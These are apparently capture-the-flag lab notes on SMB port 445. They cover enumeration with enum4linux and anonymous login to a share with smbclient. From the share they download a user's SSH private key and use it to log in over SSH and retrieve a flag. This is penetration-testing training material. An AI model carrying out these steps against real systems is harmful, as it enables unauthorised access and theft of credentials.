SMB - Server message block port 445
Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network.
Servers make file systems and other resources (printers,named pipes, APIs) available to clients on the network. Clientcomputers may have their own hard disks, but they also want accessto the shared file systems and printers on the servers.
Once they have established a connection, clients can then sendcommands (SMBs) to the server that allow them to access shares,open files, read and write files, and generally do all the sortof things that you want to do with a file system. However, inthe case of SMB, these things are done over the network

Enumerating SMB
Enum4Linux
$enum4linux [options] ip

TAG FUNCTION

-U get userlist
-M get machine list
-N get namelist dump (different from -U and-M)
-S get sharelist
-P get password policy information
-G get group and member list

-A all of the above (full basic enumeration)

Enum4Linux - $enum4linux [options] ip
$ enum4linux -A 10.10.172.114

we pulled the name of the machine POLOSMB and an interesting share “profiles”

smbclient
$smbclient //10.10.172.114/profiles -U anonymous -p 445

if our interesting share has been configured to allow anonymous access, I.E it doesn't require authentication to view the files. We can do this easily by using a exploit:

-using the username "Anonymous"
-connecting to the share we found during the enumeration stage
-and not supplying a password.

once connected - download the following
$ get .profile
$ get "Working From Home Information.txt

found users name

$ cd .ssh

$ get id_rsa

rsa key

after downloading

$ chmod 600 id_rsa
$ get id_rsa.pub

rsa key info including cactus@polosmb

use the following info to login in the box
the rsa key id_rsa, the username cactus and the ip

$ssh -i ./id_rsa cactus@10.10.172.114

Pull the smb.txt file to grab the flag